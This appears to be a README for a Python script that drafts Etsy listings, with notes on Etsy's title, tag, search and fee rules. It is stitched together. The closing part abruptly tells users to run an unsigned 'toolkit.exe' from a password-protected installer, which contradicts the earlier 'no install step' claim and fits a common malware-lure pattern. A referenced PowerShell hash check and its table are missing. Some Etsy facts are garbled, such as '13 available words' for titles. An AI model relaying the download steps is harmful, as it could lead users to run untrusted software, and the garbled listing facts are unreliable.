1. Fill in the brief

templates/etsy-item.yaml is the starting point. Copy it, fill in your own numbers, and keep the field names - the script reads them by name.

2. Run the script

The script is standalone: Python 3 standard library only, no install step, no network calls, no API keys.

3. Check the result against the reference

references/etsy-listing-rules.md holds the limits, the US rules and the checklist the output has to satisfy. Read it before you send anything to a customer or a platform.

Etsy's listing limits

• Title: 140 characters, and Etsy recommends using all 13 available words.
• Tags: 13 per listing, 20 characters each, with no competitor brands.
• Description: up to 13,000 characters, so put the specifics near the top.

What Etsy's search reads

• Title words, tags, attributes and the category all feed the listing's search match.
• Long-tail phrases beat one broad tag, because they match what a buyer actually types.
• Renewals happen every four months or when the item sells, so the listing date matters.

Pricing and money

• The listing fee is 20 cents, charged when the listing starts and again at renewal.
• Etsy collects sales tax in the states where it acts as the marketplace facilitator, and sellers still file their own tax in the other states.
• Check the fee table in your own shop for the payment processing and Offsite Ads rates that apply to your volume.

Check the download before you run it. PowerShell:

The hash must match the value in the table. Then extract the archive and start multitool/toolkit.exe.

The program is not code-signed, so Windows SmartScreen shows Unknown publisher. Run it only if you accept an unsigned program, keep it in a folder of its own, and do not run it as administrator unless you have a reason to.

The installer asks for a password; ask the publisher for it before you start.
